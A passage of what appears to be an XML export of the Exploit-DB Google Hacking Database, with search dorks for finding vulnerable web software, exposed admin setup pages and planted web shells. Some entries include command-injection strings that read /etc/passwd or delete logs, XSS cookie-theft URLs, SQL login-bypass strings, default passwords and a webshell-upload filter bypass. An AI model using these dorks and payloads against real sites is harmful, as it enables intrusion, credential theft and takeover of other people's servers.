<textualDescription>The CartWIZ eCommerce Shopping Cart System will help you build your online store through an interactive web-based e-commerce administration interface.There are, multiple sql injection and xss in cartwiz asp cart.http://neworder.box.sk/explread.php?newsid=13534</textualDescription>
<query>inurl:cartwiz/store/index.asp</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3Acartwiz%2Fstore%2Findex.asp</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>953</id>
<link>https://www.exploit-db.com/ghdb/953</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:cgi-bin inurl:bigate.cgi</shortDescription>
<textualDescription>Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work.</textualDescription>
<query>inurl:cgi-bin inurl:bigate.cgi</query>
<querystring>https://www.google.com/search?q=inurl:cgi-bin+inurl:bigate.cgi&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=1</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>524</id>
<link>https://www.exploit-db.com/ghdb/524</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:cgi.asx?StoreID</shortDescription>
<textualDescription>BeyondTV is a web based software product which let you manage your TV station. All you need is to install a TV tuner card on your PC and Connect your TV source (i.e. television antenna) to your TV tuner card. With a installed BeyondTV version you can now administrate your TV with your browser even over the internet.</textualDescription>
<query>inurl:cgi.asx?StoreID</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3Acgi.asx%3FStoreID+%0D%0A+%0D%0A&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>543</id>
<link>https://www.exploit-db.com/ghdb/543</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:changepassword.cgi -cvs</shortDescription>
<textualDescription>Allows a user to change his/her password for authentication to the system. Script allows for repeated failed attempts making this script vulnerable to brute force.</textualDescription>
<query>inurl:changepassword.cgi -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3Achangepassword.cgi+-cvs</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>629</id>
<link>https://www.exploit-db.com/ghdb/629</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:click.php intext:PHPClickLog</shortDescription>
<textualDescription>A script written in PHP 4 which logs a user's statistics when they click on a link. The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section.</textualDescription>
<query>inurl:click.php intext:PHPClickLog</query>
<querystring>https://www.google.com/search?q=inurl%3Aclick.php+intext%3APHPClickLog+%0D%0A</querystring>
<edb></edb>
<date>2004-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>4281</id>
<link>https://www.exploit-db.com/ghdb/4281</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:demo.browse.php intitle:getid3</shortDescription>
<textualDescription>The getID3 demo can allow directory traversal, deleting files, etc.
https://github.com/JamesHeinrich/getID3/blob/master/demos/demo.browse.php
Sean Murphy / Senior Developer / Wordfence
4948 DD81 CF99 3510 DFF0 44A6 A6D8 401E D683 98F5
</textualDescription>
<query>inurl:demo.browse.php intitle:getid3</query>
<querystring>https://www.google.com/search?q=inurl:demo.browse.php intitle:getid3</querystring>
<edb></edb>
<date>2016-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1222</id>
<link>https://www.exploit-db.com/ghdb/1222</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:guestbook/guestbooklist.asp &quot;Post Date&quot; From Country</shortDescription>
<textualDescription>A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork): inurl:guestbook/guestbooklist.asp &quot;Post Date&quot; From Country Results 1 - 21 of 123Announcement: inurl:MainAnnounce1.asp &quot;show all&quot; Results 1 -20 of 86WebDirectory: inurl:webdirectory &quot;Total Available Web Sites&quot; Search Results 1 - 4 of 5MailingList: inurl:maillinglist/emailsadd.asp Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out.</textualDescription>
<query>inurl:guestbook/guestbooklist.asp &quot;Post Date&quot; From</query>
<querystring>https://www.google.com/search?num=100&amp;q=inurl%3Aguestbook%2Fguestbooklist.asp+%22Post+Date%22+From+Country</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>1054</id>
<link>https://www.exploit-db.com/ghdb/1054</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:nquser.php filetype:php</shortDescription>
<textualDescription>Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text &quot;Ping IP Address or Host Name&quot;, example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=&quot;/&gt;alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&amp;highlight='.system($HTTP_GET_VARS[command].'&amp;command=cat%20/etc/passwd</textualDescription>
<query>inurl:nquser.php filetype:php</query>
<querystring>https://www.google.com/search?hl=it&amp;q=inurl%3Anquser.php+filetype%3Aphp&amp;btnG=Cerca+con+Google</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>721</id>
<link>https://www.exploit-db.com/ghdb/721</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:php.exe filetype:exe -example.com</shortDescription>
<textualDescription>It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)</textualDescription>
<query>inurl:php.exe filetype:exe -example.com</query>
<querystring>https://www.google.com/search?q=inurl%3Aphp.exe+filetype%3Aexe+-example.com</querystring>
<edb></edb>
<date>2004-11-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>454</id>
<link>https://www.exploit-db.com/ghdb/454</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:robpoll.cgi filetype:cgi</shortDescription>
<textualDescription>robpoll.cgi is used to administrate polls.The default password used for adding polls is 'robpoll'. All of the results should look something like this: &quot;http://www.example.com/robpoll.cgi?start&quot;. An attacker may change robpoll.cgi pointing to admin like this: &quot;http://www.example.com/robpoll.cgi?admin&quot;.</textualDescription>
<query>inurl:robpoll.cgi filetype:cgi</query>
<querystring>https://www.google.com/search?safe=off&amp;q=inurl%3Arobpoll.cgi+filetype%3Acgi</querystring>
<edb></edb>
<date>2004-08-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>1306</id>
<link>https://www.exploit-db.com/ghdb/1306</link>
<category>Vulnerable Files</category>
<shortDescription>inurl:updown.php | intext:&quot;Powered by PHP Uploader Downloader&quot;</shortDescription>
<textualDescription>this (evil ) script lets you to upload a php shell on target server, in most cases not password protected dork: inurl:updown.php | intext:&quot;Powered by PHP Uploader Downloader&quot; a note: sometimes you don't see a link to a list of uploaded files... just switch to http://[target]/[path]/updown.php?action=download</textualDescription>
<query>inurl:updown.php | intext:&quot;Powered by PHP Uploader Downloader&quot;</query>
<querystring>https://www.google.com/search?hl=it&amp;q=inurl%3Aupdown.php+%7C+intext%3A%22Powered+by+PHP+Uploader+Downloader%22+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3723</id>
<link>https://www.exploit-db.com/ghdb/3723</link>
<category>Vulnerable Files</category>
<shortDescription>ionCube Loader Wizard information disclosure</shortDescription>
<textualDescription>inurl:loader-wizard ext:php
This dork displays sensitive information
Auth0r: MaXe</textualDescription>
<query>ionCube Loader Wizard information disclosure</query>
<querystring>https://www.google.com/search?q=inurl:loader-wizard ext:php</querystring>
<edb></edb>
<date>2011-05-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>459</id>
<link>https://www.exploit-db.com/ghdb/459</link>
<category>Vulnerable Files</category>
<shortDescription>link:http://www.toastforums.com/</shortDescription>
<textualDescription>Toast Forums is an ASP message board on the Internet. Toast Forums also has all the features of an advanced message board (see hxxp://www.toastforums.com/). The problem is in the install documentation (quoting):-- start quote --2. Rename the data.mdb file to a different name. After renaming the data.mdb file, open constants.asp and change the tstDBConnectString constant to reflect the new name. -- end quote --This search finds sites running Toast Forum by using the LINK: operator. Trial and error is needed to find the database file from the results by changing the URL. Member data can be found in the table &quot;tstdb_Member&quot;. It looks like this:&quot;ID&quot; &quot;FName&quot; &quot;LName&quot; &quot;Username&quot; &quot;Password&quot; &quot;Email&quot; &quot;HideEmail&quot; &quot;ICQ&quot; &quot;Homepage&quot; &quot;Signature&quot; &quot;IP&quot; &quot;Skin&quot; &quot;IncludeSignature&quot; &quot;NotifyDefault&quot; &quot;PostCount&quot; &quot;LastLoginDate&quot; &quot;LastPostDate&quot;Passwords are encrypted with the RC4 algoritm, so an attacker would find cracking them is (more) difficult (than usual).</textualDescription>
<query>link:http://www.toastforums.com/</query>
<querystring>https://www.google.com/search?q=link%3Ahttp%3A%2F%2Fwww.toastforums.com%2F&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-09-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>475</id>
<link>https://www.exploit-db.com/ghdb/475</link>
<category>Vulnerable Files</category>
<shortDescription>PHP-Nuke - create super user right now !</shortDescription>
<textualDescription>PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:&quot;Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.&quot;</textualDescription>
<query>&quot;create the Super User&quot; &quot;now by clicking here&quot;</query>
<querystring>https://www.google.com/search?q=%22create+the+Super+User%22+%22now+by+clicking+here%22</querystring>
<edb></edb>
<date>2004-09-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>1053</id>
<link>https://www.exploit-db.com/ghdb/1053</link>
<category>Vulnerable Files</category>
<shortDescription>PHPFreeNews inurl:Admin.php</shortDescription>
<textualDescription>29/07/2005 8.36.03PHPFreeNews Version 1.32 (&amp; previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;NewsDir=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&amp;NewsDir=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;NewsDir=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;PopupWidth=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&amp;PopupHeight=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;PopupWidth=&quot;)}//--&gt;alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&amp;PopupHeight=&quot;)}//--&gt;alert(document.cookie)also a user can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP &amp; MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version</textualDescription>
<query>PHPFreeNews inurl:Admin.php</query>
<querystring>https://www.google.com/search?q=PHPFreeNews+inurl:Admin.php&amp;hl=it&amp;filter=0</querystring>
<edb></edb>
<date>2005-08-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>30</id>
<link>https://www.exploit-db.com/ghdb/30</link>
<category>Vulnerable Files</category>
<shortDescription>The Master List</shortDescription>
<textualDescription>Click on any of the following links to show google's list!
- _vti_inf.html (694 hits)
- service.pwd (11,800 hits)
- users.pwd (23 hits)
- authors.pwd (22 hits)
- administrators.pwd (22 hits)
- shtml.dll (780 hits)
- shtml.exe (761 hits)
- fpcount.exe (1,370 hits)
- default.asp (2,170 hits)
- showcode.asp (4 hits)
- sendmail.cfm (5 hits)
- getFile.cfm (7 hits)
- imagemap.exe (510 hits)
- test.bat (353 hits)
- msadcs.dll (8 hits)
- htimage.exe (513 hits)
- counter.exe (164 hits)
- browser.inc (11 hits)
- hello.bat (18 hits)
- default.asp\ (2,170 hits)
- dvwssr.dll (571 hits)
- dvwssr.dll (571 hits)
- dvwssr.dll (571 hits)
- cart32.exe (9 hits)
- add.exe (38 hits)
- index.JSP (998 hits)
- index.jsp (998 hits)
- SessionServlet (46 hits)
- shtml.dll (780 hits)
- index.cfm (473 hits)
- page.cfm (5 hits)
- shtml.exe (761 hits)
- web_store.cgi (16 hits)
- shop.cgi (63 hits)
- upload.asp (27 hits)
- default.asp (2,170 hits)
- pbserver.dll (6 hits)
- phf (370 hits)
- test-cgi (1,560 hits)
- finger (23,900 hits)
- Count.cgi (8,710 hits)
- jj (5,600 hits)
- php.cgi (170 hits)
- php (48,000 hits)
- nph-test-cgi (132 hits)
- handler (9,220 hits)
- webdist.cgi (35 hits)
- webgais (37 hits)
- websendmail (12 hits)
- faxsurvey (27 hits)
- htmlscript (50 hits)
- perl.exe (340 hits)
- wwwboard.pl (455 hits)
- www-sql (26,500 hits)
- view-source (641 hits)
- campas (94 hits)
- aglimpse (12 hits)
- glimpse (4,530 hits)
- man.sh (127 hits)
- AT-admin.cgi (789 hits)
- AT-generate.cgi (14 hits)
- filemail.pl (5 hits)
- maillist.pl (16 hits)
- info2www (737 hits)
- files.pl (267 hits)
- bnbform.cgi (91 hits)
- survey.cgi (93 hits)
- classifieds.cgi (25 hits)
- wrap (14,000 hits)
- cgiwrap (1,270 hits)
- edit.pl (114 hits)
- perl (80,700 hits)
- names.nsf (12 hits)
- webgais (37 hits)
- dumpenv.pl (7 hits)
- test.cgi (1,560 hits)
- submit.cgi (79 hits)
- submit.cgi (79 hits)
- guestbook.cgi (528 hits)
- guestbook.pl (451 hits)
- cachemgr.cgi (25 hits)
- responder.cgi (4 hits)
- perlshop.cgi (30 hits)
- query (15,500 hits)
- w3-msql (877 hits)
- plusmail (12 hits)
- htsearch (177 hits)
- infosrch.cgi (19 hits)
- publisher (2,610 hits)
- ultraboard.cgi (24 hits)
- db.cgi (96 hits)
- formmail.cgi (420 hits)
- allmanage.pl (5 hits)
- ssi (9,550 hits)
- adpassword.txt (39 hits)
- redirect.cgi (60 hits)
- f (124,000 hits)
- cvsweb.cgi (78 hits)
- login.jsp (241 hits)
- login.jsp (241 hits)
- dbconnect.inc (18 hits)
- admin (57,000 hits)
- htgrep (30 hits)
- wais.pl (133 hits)
- amadmin.pl (14 hits)
- subscribe.pl (65 hits)
- news.cgi (387 hits)
- auctionweaver.pl (2 hits)
- .htpasswd (2,390 hits)
- acid_main.php (3 hits)
- access_log (1,250 hits)
- access-log (618 hits)
- access.log (618 hits)
- log.htm (386 hits)
- log.html (1,310 hits)
- log.txt (987 hits)
- logfile (23,200 hits)
- logfile.htm (76 hits)
- logfile.html (671 hits)
- logfile.txt (701 hits)
- logger.html (37 hits)
- stat.htm (398 hits)
- stats.htm (687 hits)
- stats.html (1,840 hits)
- stats.txt (342 hits)
- webaccess.htm (11 hits)
- wwwstats.html (80 hits)
- source.asp (11 hits)
- perl (80,700 hits)
- mailto.cgi (46 hits)
- YaBB.pl (35 hits)
- mailform.pl (670 hits)
- cached_feed.cgi (6 hits)
- cr (27,500 hits)
- global.cgi (14 hits)
- Search.pl (548 hits)
- build.cgi (74 hits)
- common.php (184 hits)
- common.php (184 hits)
- show (33,500 hits)
- global.inc (114 hits)
- ad.cgi (21 hits)
- WSFTP.LOG (11 hits)
- index.html~ (81,100 hits)
- index.php~ (6,740 hits)
- index.html.bak (690 hits)
- index.php.bak (69 hits)
- print.cgi (61 hits)
- register.cgi (172 hits)
- webdriver (35 hits)
- bbs_forum.cgi (45 hits)
- mysql.class (21 hits)
- sendmail.inc (97 hits)
- CrazyWWWBoard.cgi (68 hits)
- search.pl (548 hits)
- way-board.cgi (44 hits)
- webpage.cgi (89 hits)
- pwd.dat (22 hits)
- adcycle (12 hits)
- post-query (240 hits)
- help.cgi (69 hits)</textualDescription>
<query>TOO MANY</query>
<querystring>TOO MANY</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>3722</id>
<link>https://www.exploit-db.com/ghdb/3722</link>
<category>Vulnerable Files</category>
<shortDescription>vBulletin Install Page Detection</shortDescription>
<textualDescription>inurl:/install/install.php intitle:vBulletin * Install System
This dork displays the untreated install.php pages!
Auth0r: lionaneesh
Greetz to :Team Indishell , INDIA , Aasim Shaikh ,</textualDescription>
<query>vBulletin Install Page Detection</query>
<querystring>https://www.google.com/search?q=inurl:/install/install.php intitle:vBulletin * Install System</querystring>
<edb></edb>
<date>2011-05-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>3640</id>
<link>https://www.exploit-db.com/ghdb/3640</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;CGI-Telnet Unit-x Team Connected to *.com&quot; OR &quot;CGI-Telnet Unit-x Team Connected to&quot;</shortDescription>
<textualDescription>Locates CGI-Telnet web shells. Author: ScOrPiOn</textualDescription>
<query>&quot;CGI-Telnet Unit-x Team Connected to *.com&quot; OR &quot;CGI-Telnet Unit-x Team Connected to&quot;</query>
<querystring>https://www.google.com/search?q=%22CGI-Telnet+Unit-x+Team+Connected+to+*.com%22+OR+%22CGI-Telnet+Unit-x+Team+Connected+to%22</querystring>
<edb></edb>
<date>2010-12-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4385</id>
<link>https://www.exploit-db.com/ghdb/4385</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;dirLIST - PHP Directory Lister&quot; &quot;Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx&quot; &quot;index of&quot; ext:php</shortDescription>
<textualDescription>Google Dork: &quot;dirLIST - PHP Directory Lister&quot; &quot;Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx&quot; &quot;index of&quot; ext:php
Find vulnerable servers: dirLIST - PHP Directory Lister v0.3.0
Google Dork by Ini Lerm
Example to exploit it using a form in PHP and upload a webshell.
Remember, rename your webshell.
If your webshell is called &quot;shell1.php&quot; rename &quot;shell1.php .;&quot;
------------------------------------------PHP CODE--------------------------------------------------------</textualDescription>
<query>&quot;dirLIST - PHP Directory Lister&quot; &quot;Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx&quot; &quot;index of&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;dirLIST - PHP Directory Lister&quot; &quot;Banned files: php | php3 | php4 | php5 | htaccess | htpasswd | asp | aspx&quot; &quot;index of&quot; ext:php</querystring>
<edb></edb>
<date>2017-01-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>440</id>
<link>https://www.exploit-db.com/ghdb/440</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;ftp://&quot; &quot;www.eastgame.net&quot;</shortDescription>
<textualDescription>Use this search to find eastgame.net ftp servers, loads of warez and that sort of thing.&quot;thankyou4share&quot; !</textualDescription>
<query>&quot;ftp://&quot; &quot;www.eastgame.net&quot;</query>
<querystring>https://www.google.com/search?q=%22ftp%3A%2F%2F%22+%22www.eastgame.net%22+&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>1020</id>
<link>https://www.exploit-db.com/ghdb/1020</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;html allowed&quot; guestbook</shortDescription>
<textualDescription>When this is typed in google it finds websites which have HTML Enabled guestbooks. This is really stupid as users could totally mess up their guestbook by adding commands like or adding a loop javascript pop-up</textualDescription>
<query>&quot;html allowed&quot; guestbook</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22html+allowed%22+guestbook</querystring>
<edb></edb>
<date>2005-06-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>3948</id>
<link>https://www.exploit-db.com/ghdb/3948</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;OpenSSL&quot; AND &quot;1.0.1 Server at&quot; OR &quot;1.0.1a Server at&quot; OR &quot;1.0.1b Server at&quot; OR &quot;1.0.1c Server at&quot; OR &quot;1.0.1d Server at&quot; OR &quot;1.0.1e Server at&quot; OR &quot;1.0.1f Server at&quot;</shortDescription>
<textualDescription>Search for all Apache servers that are running specific versions of
OpenSSL. These specific versions of OpenSSL could potentially be vulnerable
to the heartbleed attack.
Ahmad Al-Nounou
</textualDescription>
<query>&quot;OpenSSL&quot; AND &quot;1.0.1 Server at&quot; OR &quot;1.0.1a Server at&quot; OR &quot;1.0.1b Server at&quot; OR &quot;1.0.1c Server at&quot; OR &quot;1.0.1d Server at&quot; OR &quot;1.0.1e Server at&quot; OR &quot;1.0.1f Server at&quot;</query>
<querystring>https://www.google.com/search?q=&quot;OpenSSL&quot; AND &quot;1.0.1 Server at&quot; OR &quot;1.0.1a Server at&quot; OR &quot;1.0.1b Server at&quot; OR &quot;1.0.1c Server at&quot; OR &quot;1.0.1d Server at&quot; OR &quot;1.0.1e Server at&quot; OR &quot;1.0.1f Server at&quot;</querystring>
<edb></edb>
<date>2014-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>6161</id>
<link>https://www.exploit-db.com/ghdb/6161</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Powered by Jira Service Desk&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Powered by Jira Service Desk&quot;
# By using this dork it is possible to find sites vulnerable to
CVE-2019-15003, CVE-2019-15004.
# Date: 29/05/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Powered by Jira Service Desk&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Jira Service Desk&quot;</querystring>
<edb></edb>
<date>2020-06-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>913</id>
<link>https://www.exploit-db.com/ghdb/913</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Powered by: vBulletin Version 1.1.5&quot;</shortDescription>
<textualDescription>This google dork reveals vulnerable message boards. It works for all Vbulletin version up to 2.0 beta 2. To try for other versions just change the version number in the dork.These vulnerable message boards allow remote code execution.More on this can be found here:http://www.securiteam.com/securitynews/5IP0B203PI.htmlit has a fairly good explanation of the exploits incorporated with these versions.</textualDescription>
<query>&quot;Powered by: vBulletin Version 1.1.5&quot;</query>
<querystring>https://www.google.com/search?q=%22Powered+by%3A+vBulletin+Version+1.1.5%22</querystring>
<edb></edb>
<date>2005-03-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>3634</id>
<link>https://www.exploit-db.com/ghdb/3634</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;r57shell 1.4&quot;</shortDescription>
<textualDescription>Locates r57 web shells Author: ScOrPiOn</textualDescription>
<query>&quot;r57shell 1.4&quot;</query>
<querystring>https://www.google.com/search?q=%22r57shell+1.4%22</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3635</id>
<link>https://www.exploit-db.com/ghdb/3635</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;r57shell&quot;</shortDescription>
<textualDescription>Locates r57 web shells Author: ScOrPiOn</textualDescription>
<query>&quot;r57shell&quot;</query>
<querystring>https://www.google.com/search?q=%22r57shell%22</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>3637</id>
<link>https://www.exploit-db.com/ghdb/3637</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *&quot;</shortDescription>
<textualDescription>Locates r57 web shells Author: ScOrPiOn</textualDescription>
<query>&quot;safe_mode: * PHP version: * cURL: * MySQL: * MSSQL: * PostgreSQL: * Oracle: *&quot;</query>
<querystring>https://www.google.com/search?q=%22safe_mode:+*++PHP+version:+*++cURL:+*++MySQL:+*++MSSQL:+*++PostgreSQL:+*++Oracle:+*%22</querystring>
<edb></edb>
<date>2010-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>138</id>
<link>https://www.exploit-db.com/ghdb/138</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Select a database to view&quot; intitle:&quot;filemaker pro&quot;</shortDescription>
<textualDescription>An oldie but a goodie. This search locates servers which provides access to Filemaker pro databases via the web. The severity of this search varies wildly depending on the security of the database itself. Regardless, if Google can crawl it, it's potentially using cleartext authentication.</textualDescription>
<query>&quot;Select a database to view&quot; intitle:&quot;filemaker pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Select+a+database+to+view%22+intitle%3A%22filemaker+pro%22</querystring>
<edb></edb>
<date>2004-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1027</id>
<link>https://www.exploit-db.com/ghdb/1027</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;set up the administrator user&quot; inurl:pivot</shortDescription>
<textualDescription>Using this, you can find sites with a Pivot weblog installed but not set up. The default set up screen on Pivot has you create an administrator account, so, using this, you can create an account on someone else's weblog, post, and manage the blog.</textualDescription>
<query>&quot;set up the administrator user&quot; inurl:pivot</query>
<querystring>https://www.google.com/search?q=%22set+up+the+administrator+user%22+inurl%3Apivot</querystring>
<edb></edb>
<date>2005-07-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>806</id>
<link>https://www.exploit-db.com/ghdb/806</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;There are no Administrators Accounts&quot; inurl:admin.php -mysql_fetch_row</shortDescription>
<textualDescription>This is a more specific search for the vulnerable PhpNuke index already seen on this website.PhpNuke asks you to set up an admin account when it is first installed. This search is a list of people who never set up that account! It will take you directly to the administrator registration of a vulnerable server. The -mysql_fetch_row will remove listings where SQL is simply broken.</textualDescription>
<query>&quot;There are no Administrators Accounts&quot; inurl:admin.php -mysql_fetch_row</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22There+are+no+Administrators+Accounts%22+inurl%3Aadmin.php+-mysql_fetch_row</querystring>
<edb></edb>
<date>2004-12-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>1118</id>
<link>https://www.exploit-db.com/ghdb/1118</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Welcome to Administration&quot; &quot;General&quot; &quot;Local Domains&quot; &quot;SMTP Authentication&quot; inurl:admin</shortDescription>
<textualDescription>This reveals admin site for Argo Software Design Mail Server.</textualDescription>
<query>&quot;Welcome to Administration&quot; &quot;General&quot; &quot;Local Domains&quot; &quot;SMTP Authentication&quot; inurl:admin</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;as_qdr=all&amp;q=%22Welcome+to+Administration%22+%22General%22+%22Local+Domains%22+%22SMTP+Authentication%22+inurl%3Aadmin</querystring>
<edb></edb>
<date>2005-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>119</id>
<link>https://www.exploit-db.com/ghdb/119</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Welcome to Intranet&quot;</shortDescription>
<textualDescription>According to whatis.com: &quot;An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.&quot; Intranets, by definition should not be available to the Internet's unwashed masses as they may contain private corporate information.</textualDescription>
<query>&quot;Welcome to Intranet&quot;</query>
<querystring>https://www.google.com/search?q=%22Welcome+to+Intranet%22</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>131</id>
<link>https://www.exploit-db.com/ghdb/131</link>
<category>Vulnerable Servers</category>
<shortDescription>&quot;Welcome to PHP-Nuke&quot; congratulations</shortDescription>
